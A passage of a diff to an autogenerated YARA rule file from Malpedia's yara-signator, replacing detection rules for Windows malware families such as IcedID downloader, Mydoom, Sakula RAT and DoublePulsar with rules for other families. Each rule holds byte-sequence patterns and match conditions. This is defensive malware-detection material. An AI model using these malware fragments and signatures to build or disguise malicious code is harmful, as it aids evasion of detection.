+		$sequence_8 = { 38d0 83d900 c1e105 01c8 }
+		$sequence_9 = { 00d3 8a16 301e 46 01fb }
+		$sequence_10 = { c1e808 31c3 895e0c 89d8 }
+		$sequence_11 = { 8b5604 0116 8b4e08 014e04 8b5e0c }
+		$sequence_12 = { 8b5d18 8b1b 4f 31c0 fec2 }
+		$sequence_13 = { f7e0 0fc8 01d0 894704 }
+		$sequence_14 = { 8b5514 8b12 8b4d0c 8b5d18 }
+		$sequence_15 = { 31c9 8b55f4 8b75ec 89723c c7424003000000 }
+		$sequence_16 = { 56 83ec28 8b450c 8b4d08 8d154e30d201 }
+		$sequence_17 = { 83ec44 8b4508 8d0d2030d201 31d2 890c24 c744240400000000 }
+		$sequence_18 = { 890424 894c2404 e8???????? 8d0d3430d201 }
+		$sequence_19 = { 5b 5d c3 8b45f0 8b0c850440d201 }
+		$sequence_20 = { 53 56 57 83ec44 8b4508 8d0d2030d201 }
+		$sequence_21 = { 31d2 890c24 c744240400000000 8945f4 8955f0 e8???????? 8d0d8630d201 }
+		$sequence_22 = { 55 89e5 83ec10 8b4508 8d0d3430d201 }
 
 	condition:
-		7 of them and filesize < 1141760
+		1 of them and filesize < 2375680
 }
-rule MALPEDIA_Win_Deeppost_Auto : FILE
+rule MALPEDIA_Win_Akdoortea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "26540ba9-fd06-58b9-819a-14fd842afc11"
+		id = "273d2f0d-acc7-5ac9-9a11-3e8564a6c5a7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deeppost"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deeppost_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akdoortea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.akdoortea_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "728aa018aa6f90f3b8f03324b5446d97f2579b8aa528bcd211ab4ccdadb166ba"
+		logic_hash = "2fa5ad11741a8504cc8c2573ed395ff2e4f2dd319c182aa1bdba253b5a1bde31"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145544,34 +145403,34 @@ rule MALPEDIA_Win_Deeppost_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7640 e8???????? 83c410 8b4e3c 85c9 740e 8b06 }
-		$sequence_1 = { e8???????? 83c40c 85c0 7440 6a06 68???????? 56 }
-		$sequence_2 = { c1e708 0bca 0bf8 8b03 f780b800000000080000 7509 }
-		$sequence_3 = { 8bc3 c1e810 8bd6 0fb6c0 c1c208 0fb688589a4800 8bc3 }
-		$sequence_4 = { 8d85f0feffff 8bd7 53 ff7518 8bce 50 ff7510 }
-		$sequence_5 = { 8bd3 e8???????? 85c0 0f85ce000000 8d8694000000 8d8f94000000 8945fc }
-		$sequence_6 = { e8???????? 83c40c 837e1410 8b4d0c 894e10 720f 8b06 }
-		$sequence_7 = { e8???????? 83c408 85c0 0f84b4000000 6a00 c7404c805d4000 e8???????? }
-		$sequence_8 = { e8???????? 83c40c 8d0cb500000000 51 8b4dfc ff7108 ff7708 }
-		$sequence_9 = { e8???????? 83c404 85c0 0f8533080000 b901000000 894dfc e9???????? }
+		$sequence_0 = { 006118 40 007019 40 00411a }
+		$sequence_1 = { 7641 8d85f0feffff 8d5001 0f1f8000000000 8a08 }
+		$sequence_2 = { 8d8df0f9ffff 8d5002 e8???????? 8bf0 83c420 85f6 }
+		$sequence_3 = { 8bec 83ec0c 53 8bda 56 8bf1 57 }
+		$sequence_4 = { 50 8b04bdf8204200 ff741818 ff15???????? 85c0 0f95c0 eb02 }
+		$sequence_5 = { 7439 8d56ff 8a4201 8d5201 84c0 75f6 }
+		$sequence_6 = { 90 85f6 740b 83feff 0f859a000000 eb6c 8b1c8d10a24100 }
+		$sequence_7 = { e8???????? 83c414 ebe1 8b55ec 8b4de8 8b0495f8204200 807c082800 }
+		$sequence_8 = { 83c418 c745f803010000 8d45f8 50 8d4304 50 ff15???????? }
+		$sequence_9 = { ffd6 68f4010000 8bf0 ff15???????? 85ff 740e }
 
 	condition:
-		7 of them and filesize < 1332224
+		7 of them and filesize < 305152
 }
-rule MALPEDIA_Win_Racket_Auto : FILE
+rule MALPEDIA_Win_Sisfader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f3a5d01f-f04e-5cab-9782-744a7bfd597c"
+		id = "a0cdd7ba-37f5-5dee-9bd0-dfe8ed58e119"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.racket_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sisfader_auto.yar#L1-L285"
 		license_url = "N/A"
-		logic_hash = "60433cbd73972642cf68f927363d7c0cddb01db6fa6acbb68279911c92eddf9a"
+		logic_hash = "d369a40cd08ca7aac194db42ed12df65df4a56409fba20e45dda5f2780e9b9bf"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -145583,32 +145442,52 @@ rule MALPEDIA_Win_Racket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837e2400 750a c6460c00 8b35???????? 68???????? 57 ffd3 }
-		$sequence_1 = { c1e803 2401 837b0400 884303 751b 6a00 6a00 }
-		$sequence_2 = { 6a00 c706???????? 897e08 6a00 c7460c00000000 c7461000000000 6861080000 }
-		$sequence_3 = { 8945f0 56 50 8d45f4 64a300000000 8b4510 85c0 }
-		$sequence_4 = { 8987e4fdffff 8b86e0fdffff 8987e8fdffff 8b86e4fdffff 8987ecfdffff 8b86e8fdffff 8987f0fdffff }
-		$sequence_5 = { 57 53 56 8d4a1c e8???????? 5f 5b }
-		$sequence_6 = { 895dd0 8b7508 33ff 897dcc 8975bc 3b750c 0f8ddd070000 }
-		$sequence_7 = { 894dfc 394db8 0f8c37050000 8b5514 be01000000 2bd0 894df4 }
-		$sequence_8 = { f7c700000002 7446 8b0a 3b4a04 752a 837a1000 7517 }
-		$sequence_9 = { ffb548ffffff 0f57c0 c745ac00000000 8d4da4 660fd645a4 e8???????? }
+		$sequence_0 = { e8???????? 85c0 b91d000000 0f44d9 }
+		$sequence_1 = { 741f 33c0 85c9 7419 }
+		$sequence_2 = { 8905???????? c705????????00000000 8b442440 8905???????? }
+		$sequence_3 = { ff15???????? 85c0 7e08 03d8 3bdf 7c98 }
+		$sequence_4 = { 33c0 83f801 7425 baffffffff }
+		$sequence_5 = { 85c0 753e 8d47dc 8903 83f824 723b }
+		$sequence_6 = { c705????????10000000 8b442430 8905???????? c705????????07000000 }
+		$sequence_7 = { eb5b 837d0800 751f 8b451c 50 8b4d18 }
+		$sequence_8 = { 8b4508 8b4808 51 ff15???????? 83c408 8945e0 }
+		$sequence_9 = { 837c245000 7405 e9???????? 83bc248000000000 7539 }
+		$sequence_10 = { 837c245000 7402 eb12 c744245401000000 33c0 }
+		$sequence_11 = { 85c0 7502 eb71 8b45fc 8b08 }
+		$sequence_12 = { c7430438020000 66837c247c2e 751f 0fb744247e 6685c0 0f8496010000 6683f82e }
+		$sequence_13 = { ff15???????? 83c414 8945d8 837dd800 }
+		$sequence_14 = { 8b5118 52 8b45f4 8b4830 51 ff15???????? }
+		$sequence_15 = { ff15???????? 8945f8 837df800 7402 eb5b 837d0800 }
+		$sequence_16 = { 83ec60 c745fc00000000 c745e000000000 6a40 8b450c 50 e8???????? }
+		$sequence_17 = { e8???????? 85c0 7412 ba01000000 b910270000 }
+		$sequence_18 = { 89442420 837c242001 7425 837c242002 }
+		$sequence_19 = { 5e 5b 8be5 5d c3 3de3e00000 7511 }
+		$sequence_20 = { 51 ff15???????? 85c0 0f85ba010000 8b55fc 837a0c00 0f84ad010000 }
+		$sequence_21 = { 8a0410 30443924 41 3b4f04 72ee 8b4704 8bd7 }
+		$sequence_22 = { 7425 837c242002 7441 837c242003 }
+		$sequence_23 = { 0f1086f0000000 c7400410000000 c7400c00000000 0f114014 }
+		$sequence_24 = { 8b442464 89442430 8b442468 89442434 }
+		$sequence_25 = { a810 746a 8b570c 8d8c2460020000 6a00 e8???????? 83c404 }
+		$sequence_26 = { 8bd0 83e20f 8a8c0a00010000 300c18 }
+		$sequence_27 = { 685c020000 6a40 ffd6 0f1005???????? 8bf8 8b4508 0f114714 }
+		$sequence_28 = { 745d 837c242004 7479 837c242005 0f8480000000 e9???????? }
+		$sequence_29 = { c700aaeeddff 33c0 894710 c7470430020000 8d4840 ff15???????? }
 
 	condition:
-		7 of them and filesize < 985088
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Splinter_Auto : FILE
+rule MALPEDIA_Win_Crackedcantil_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d16ca329-56e4-510f-9e6c-3e0242a5a17c"
+		id = "cc3fcc34-6200-516b-a930-713cd7528fd1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.splinter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.splinter_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackedcantil"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crackedcantil_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "fbea70ebd33891fb1f580e85b1d2c0146d8b7b0ac901561f3697caf4edb74461"
+		logic_hash = "63fa5a97e37e9297a9b2c0a9f33b3e3f4a0c35e0f5f733be56805a4bbd636bfb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145622,32 +145501,32 @@ rule MALPEDIA_Win_Splinter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f048ff08 7510 488b4df0 4881c120020000 e8???????? 90 4883c420 }
-		$sequence_1 = { f048ff08 0f855dfeffff 4883c178 e8???????? e9???????? 488b8558010000 48894530 }
-		$sequence_2 = { 741b 4c39c0 0f847c000000 420fb61c02 80c3d0 49ffc0 80fb0a }
-		$sequence_3 = { e9???????? 4c8d0547ba2d00 4889c2 e8???????? 4c8d0538ba2d00 4889c1 e8???????? }
-		$sequence_4 = { e9???????? 8b05???????? 65488b0c2558000000 488b34c1 488d8e38020000 488d15c6f10000 e8???????? }
-		$sequence_5 = { f30f7f06 488b9de0030000 4885db 0f8411010000 488db550010000 488d95b0000000 41b898000000 }
-		$sequence_6 = { e8???????? 84c0 488bbd08040000 743b 8b05???????? 65488b0c2558000000 488b04c1 }
-		$sequence_7 = { e8???????? eb17 4c8955e8 4c894df0 4c8d05cc034500 4889c1 e8???????? }
-		$sequence_8 = { f30f7f8910020000 488b4c2448 4c89ea e8???????? 4889f1 4821c1 f30f6f040f }
-		$sequence_9 = { e8???????? eb2e c685c700000001 4c8d050b894c00 4c89f9 e8???????? eb16 }
+		$sequence_0 = { ffc8 89442420 837c242400 7e45 488b442428 4883780800 7429 }
+		$sequence_1 = { e8???????? 90 488d8c24e06f0000 e8???????? 488d842483000000 488bf8 33c0 }
+		$sequence_2 = { f7d9 81e9b2638081 29cb 59 81c3e75cef77 81ebcdbddaf2 01d8 }
+		$sequence_3 = { ffc9 8bc9 488b542478 88040a 488b542438 488b4c2478 e8???????? }
+		$sequence_4 = { f3aa 0fb684248e000000 88842490040000 660f6f842490570000 660f7f842470350000 488b8424c80f0000 f30f6f00 }
+		$sequence_5 = { e8???????? 90 488d842470030000 4889842478030000 488b942478030000 488d0de1993000 e8???????? }
+		$sequence_6 = { e8???????? 488bc8 e8???????? 488bc8 e8???????? 898424301c0000 ba08000000 }
+		$sequence_7 = { f3aa 488d8424b8020000 488bf8 33c0 b901000000 f3aa 488d8424b9020000 }
+		$sequence_8 = { ffc0 89442430 488b442478 0fb74060 ffc8 39442430 7d3d }
+		$sequence_9 = { e9???????? 9c 4156 4883ec08 4c893424 ff3424 415e }
 
 	condition:
-		7 of them and filesize < 20177920
+		7 of them and filesize < 37863424
 }
-rule MALPEDIA_Win_Hesperbot_Auto : FILE
+rule MALPEDIA_Win_Mydoom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e0f58539-e576-5f23-9601-3ac2130a34d6"
+		id = "7e77b916-3ba2-5a80-a19d-24731b91f9bc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hesperbot_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mydoom_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "1227a34f1bfab44843a47045e0bfbe06efc158b222a90f56ca95eeb7d184b831"
+		logic_hash = "35d52ce2fd0848990f084283aa4885b799e1dbfb0fb9f161e6a1a896179d7494"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145661,32 +145540,32 @@ rule MALPEDIA_Win_Hesperbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33f0 8b442440 0b442438 33cf 23442448 8b7c2444 8b5c2440 }
-		$sequence_1 = { 33c0 f644240401 7405 b800000200 f644240402 7405 }
-		$sequence_2 = { 33ed 0be9 33f5 8b6c244c 0fa4dd19 c1e807 c1e319 }
-		$sequence_3 = { 5e c3 56 8d7010 e8???????? 5e c3 }
-		$sequence_4 = { 0bcd 33f1 8b4c2434 0b4c242c c1e807 c1e319 0bc3 }
-		$sequence_5 = { 3bc6 741c 3930 7418 }
-		$sequence_6 = { 134c241c 01442438 89442458 8b442420 114c243c 8bf8 0facdf1c }
-		$sequence_7 = { 8b4708 89460c 8b4704 894610 8b4714 894614 8b442408 }
-		$sequence_8 = { 5f 5b 5d c3 55 8bec 81ecd8000000 }
-		$sequence_9 = { 59 85db 742f 56 ff742414 }
+		$sequence_0 = { 89442404 893424 e8???????? ba00000000 eb20 ba00000000 }
+		$sequence_1 = { 8d45f8 89442410 c744240c19000200 c744240800000000 895c2404 }
+		$sequence_2 = { c3 55 89e5 83ec48 895df4 8975f8 }
+		$sequence_3 = { e8???????? c78538feffff44000000 c78564feffff01000000 66c78568feffff0500 }
+		$sequence_4 = { 53 81ec94010000 c7442404???????? 8d9d38ffffff 891c24 }
+		$sequence_5 = { c7042401000080 e8???????? 83ec14 85c0 7547 893424 e8???????? }
+		$sequence_6 = { 380a 7415 42 803a00 7406 }
+		$sequence_7 = { 8d85c8fdffff 890424 e8???????? 83ec04 8b4508 890424 e8???????? }
+		$sequence_8 = { 8945cc 0fb745e6 668945ca c744240810000000 8d45c8 }
+		$sequence_9 = { 8b7508 8b5d0c 803b00 7414 0fbe03 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE
+rule MALPEDIA_Win_Bachosens_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7ee6583-0e42-548a-a503-976de56f1492"
+		id = "21e78cd2-1c72-5a79-a705-15dc4e8e3d2a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icedid_downloader_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bachosens_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "3ad62116cc53f8a172c118313873b176a6f13aff503ffabc7e8b01bb236f4bad"
+		logic_hash = "34aedbb89c2e7af974768523a03e9308ee6c49afb8486001bfd1e9169e8bf87c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145700,34 +145579,34 @@ rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 8944241c 8d442408 50 6a08 6aff 885c241c }
-		$sequence_1 = { 56 6a02 ff74241c ffd7 ff15???????? 83f87a 0f85e9000000 }
-		$sequence_2 = { 8bf0 e8???????? 85f6 740c 8b4508 3b07 }
-		$sequence_3 = { 83e801 740a 83e801 751c 80cb01 }
-		$sequence_4 = { 56 68000000c0 ff7510 ff15???????? }
-		$sequence_5 = { 8d442428 50 ff742438 ff15???????? 8d442440 50 68???????? }
-		$sequence_6 = { 7821 395df8 741c 6a04 8d45f8 }
-		$sequence_7 = { 8b08 50 ff5114 85c0 7404 33c0 }
-		$sequence_8 = { 8b442418 8d542430 59 59 56 8b08 }
-		$sequence_9 = { 896c241c 896c240c 896c2420 896c2438 895c2434 ff15???????? }
+		$sequence_0 = { 4d8bd4 4d2bdc 4d8bc4 49f7da }
+		$sequence_1 = { 488bf9 488b5018 488b5a20 488bd1 488b4b50 e8???????? }
+		$sequence_2 = { 49f7da 6666660f1f840000000000 430fb61403 410fb608 }
+		$sequence_3 = { 740e 488bc7 ffc1 488d4001 803800 }
+		$sequence_4 = { 33d2 385500 740e 488bc5 ffc2 }
+		$sequence_5 = { 660f1f840000000000 420fb61407 410fb608 8d429f }
+		$sequence_6 = { 41380a 7417 498bc2 660f1f840000000000 ffc1 }
+		$sequence_7 = { 66390a 7417 488bc2 0f1f840000000000 ffc1 488d4002 }
+		$sequence_8 = { 430fb61403 410fb608 8d429f 3c19 }
+		$sequence_9 = { 803800 75f5 3bca 7550 4c63d1 85c9 7e42 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 643072
 }
-rule MALPEDIA_Win_Upatre_Auto : FILE
+rule MALPEDIA_Win_Sakula_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "040bdafc-33da-58ba-b810-486451f4b678"
+		id = "5af52a87-4449-5086-85f2-378359f4ae21"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.upatre_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sakula_rat_auto.yar#L1-L238"
 		license_url = "N/A"
-		logic_hash = "3a267d65c074b009b5eb1fad7789aa126fe3aa82fa66dade27c6fa55c83ed7ca"
+		logic_hash = "58d4e203f11e4dd863a93827734d462109e66a0a903d18e391705e909badfaf0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -145739,38 +145618,45 @@ rule MALPEDIA_Win_Upatre_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b02f 66ab 8b45a8 ff5504 33c9 8ac8 ff5508 }
-		$sequence_1 = { b400 66ab b02f 66ab ff7590 33c0 }
-		$sequence_2 = { 81c60e010000 ac 3c01 740c b053 66ab }
-		$sequence_3 = { 6a00 8d4dc0 51 ff75e0 ff75bc ff75ec }
-		$sequence_4 = { 58 6a00 8d4de0 51 50 }
-		$sequence_5 = { 33c0 b404 57 03f8 8bf7 }
-		$sequence_6 = { b404 895d98 8bfb 03d8 b91c010000 }
-		$sequence_7 = { 33c0 66ab bbff0f0000 8b75f0 56 53 }
-		$sequence_8 = { 68d770a437 8b4dd4 51 e8???????? 8945e8 }
-		$sequence_9 = { 83c404 0fb7c0 3b4510 7411 8b4de0 51 }
-		$sequence_10 = { 83c410 eb58 8b4df4 8b510c 52 e8???????? }
-		$sequence_11 = { 1f c011a0 6b20bd 80978041a0e3b2 34c0 8fc0 81205b606d00 }
-		$sequence_12 = { 83c108 894dfc 8b55fc 8b02 50 e8???????? }
-		$sequence_13 = { 0fb745f8 0fb74df4 99 f7f9 }
-		$sequence_14 = { 0f8416010000 8b55f4 8b420c 50 e8???????? }
-		$sequence_15 = { 7529 8b4df4 8b5110 81c200100000 8955f0 8d45f0 }
+		$sequence_0 = { 6a00 6800010000 6a00 6a00 68???????? }
+		$sequence_1 = { b802000000 eb0a f7d8 1bc0 83e0fd }
+		$sequence_2 = { 83e103 8d8396000000 f3a4 8bc8 8a10 40 84d2 }
+		$sequence_3 = { 33f6 8d4900 ff15???????? 33d2 b914000000 }
+		$sequence_4 = { 889c244b010000 48 8d642400 8a4801 40 3acb }
+		$sequence_5 = { eb05 41 3bce 72dd 8d46ff }
+		$sequence_6 = { 50 6800040000 57 6a02 51 ff15???????? }
+		$sequence_7 = { 6a00 6a00 6a00 53 6aff 56 6a00 }
+		$sequence_8 = { 48895c2420 ff15???????? 33d2 488bcb ff15???????? }
+		$sequence_9 = { 8b45f8 8b5df4 39d8 721e 741c 29d8 0345fc }
+		$sequence_10 = { 4c8d4dd7 4c8d05791d0000 488d0d8a1d0000 33d2 ff15???????? }
+		$sequence_11 = { e8???????? 8b45f0 eb02 31c0 50 ff75fc e8???????? }
+		$sequence_12 = { 3bc6 745f 4c8d4dcf 4c8d055b1d0000 488d0d7c1f0000 }
+		$sequence_13 = { 8b4d08 034df8 0fbe11 83fa41 7c16 8b4508 0345f8 }
+		$sequence_14 = { 488bd8 4885c0 0f84d3000000 8d7e2f 33d2 488bc8 448bc7 }
+		$sequence_15 = { e8???????? 83f800 7405 8b45ec }
+		$sequence_16 = { ff15???????? 488bce 488bd8 ff15???????? 488364243800 488364243000 4c8bc6 }
+		$sequence_17 = { ba14008410 488b01 ff5028 3bc6 747d }
+		$sequence_18 = { 488b55d7 488b01 488364242000 4c8d0d240f0000 ff9080000000 3bc6 }
+		$sequence_19 = { 8945f0 83f800 0f84e7000000 6804010000 ff75f0 }
+		$sequence_20 = { 83f800 742e 8b5d08 8b4df4 8b4114 8903 8b4110 }
+		$sequence_21 = { 488bce ff15???????? 488364243800 488364243000 8364242800 488364242000 448bc8 }
+		$sequence_22 = { 689c000000 e8???????? 8945fc 83f800 0f84ab000000 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Warhawk_Auto : FILE
+rule MALPEDIA_Win_Qaccel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7fcbe369-7eba-5509-9f6c-bc41b0560179"
+		id = "f1f0f47f-9fac-5c10-a4e8-a1707e10823b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warhawk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warhawk_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.qaccel_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "44d5f6f70697925bfa262390ea7caffa63c489e29c99852e5d174229a319929a"
+		logic_hash = "3da505a80435da5e26f3793d381f00e69d927d9829311958eb99f2abec85d62f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145784,32 +145670,32 @@ rule MALPEDIA_Win_Warhawk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8be5 5d c3 bb02000000 8b4dfc 8bc3 }
-		$sequence_1 = { 83f809 0f8799000000 ff248521b34000 ff7510 ff750c e8???????? }
-		$sequence_2 = { 0f8482000000 53 57 6a28 ff15???????? 8bd8 83c404 }
-		$sequence_3 = { 0f8473010000 8d85fcfbffff 8d5001 660f1f440000 8a08 40 84c9 }
-		$sequence_4 = { 0fb606 50 e8???????? 0fb60b }
-		$sequence_5 = { e711 a0???????? ad fb 93 9f b66c }
-		$sequence_6 = { 85c9 7406 8b4204 894104 8b4e08 3bd1 }
-		$sequence_7 = { 8b7d0c 33db 897df4 8975f8 8945fc 8a06 3a8358e94100 }
-		$sequence_8 = { 0fb680201c4000 ff2485001c4000 c6065c eb30 c60622 eb2b c60662 }
-		$sequence_9 = { 660f2fda 0f93c0 85c0 754d }
+		$sequence_0 = { 85c0 0f842b010000 8b7d0c 85ff 0f8420010000 8b4d10 85c9 }
+		$sequence_1 = { 0f880a000000 0f8904000000 5f 5f }
+		$sequence_2 = { 41 83c210 894df8 8b1b }
+		$sequence_3 = { ff15???????? 50 ff15???????? 85db 7525 b941000000 }
+		$sequence_4 = { 8bf9 81e1ffff0000 83c102 51 ff15???????? 8bf0 }
+		$sequence_5 = { 8b35???????? 83c408 ffd6 99 b91a000000 }
+		$sequence_6 = { 5f 8b4d24 85c9 740a 8b45e0 }
+		$sequence_7 = { 85c0 0f8439010000 8b55fc 81e2ffff0000 }
+		$sequence_8 = { 5f 8b86f0000000 8b550c 50 52 ff15???????? 83c408 }
+		$sequence_9 = { 83c9ff f2ae f7d1 2bf9 8d95fcfeffff 8bf7 }
 
 	condition:
-		7 of them and filesize < 2345984
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Doublepulsar_Auto : FILE
+rule MALPEDIA_Win_Aperetif_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e360b7f1-7141-5d69-b347-a9d866ef6b2b"
+		id = "1685b19d-bab9-559e-a837-4099892bca74"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doublepulsar_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aperetif_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "459595fa25b87fbf8bb9d6bb59b89562d36c28a4b010623ea717539c5888323b"
+		logic_hash = "8b99a188c4357f2054441c5cc8823b451c95e41e20e854ee376e3b8dd6441f0d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -145823,32 +145709,32 @@ rule MALPEDIA_Win_Doublepulsar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668b00 c3 81e2ffff0000 c1e202 01d1 8b09 01c8 }
-		$sequence_1 = { 6852445000 ff75fc 6a01 ff13 }
-		$sequence_2 = { 894530 8b4620 8b7d65 83c703 8907 8b4628 a902000000 }
-		$sequence_3 = { ff500c 85c0 748c 33c0 5f 5e 5b }
-		$sequence_4 = { 8b8c003cb54000 03c0 894e5c 8b9040b54000 895660 8b8844b54000 894e64 }
-		$sequence_5 = { 85c0 7463 8b442444 6a0e 53 50 }
-		$sequence_6 = { 88c8 c1e908 00c8 c1e908 00c8 c1e908 00c8 }
-		$sequence_7 = { 03d8 2be8 85ed 75ac }
-		$sequence_8 = { e8???????? a1???????? 33c4 898424a0100000 55 56 8bb424b0100000 }
-		$sequence_9 = { 0f85f4000000 41 83f813 0f8287010000 8b4a0b 41 8bc0 }
+		$sequence_0 = { ff7708 50 e8???????? 83c40c ff7708 8b442418 50 }
+		$sequence_1 = { f20f1186080b0000 c7452400000000 e9???????? 85c9 0f84d8050000 697528100b0000 33ff }
+		$sequence_2 = { 8bef 8d041b 50 8b442414 8b401c ff30 ff742424 }
+		$sequence_3 = { e8???????? 8d48fe b82d000000 668901 eb0c 50 8d45ee }
+		$sequence_4 = { e8???????? 8bf0 83c410 85f6 7511 68db020000 68???????? }
+		$sequence_5 = { 8bc1 c1e810 0fb6c0 c1e208 0fb68068b98700 0bd0 8bc1 }
+		$sequence_6 = { 8b5604 83c604 85d2 0f8421010000 8d4a01 8bc2 f00fb10e }
+		$sequence_7 = { f20f5ec8 0f28d1 f20f59cb f20f59542448 660f2f0d???????? 7740 f20f1005???????? }
+		$sequence_8 = { ff7508 8910 8b55e8 897004 895008 e8???????? c74310507c5c00 }
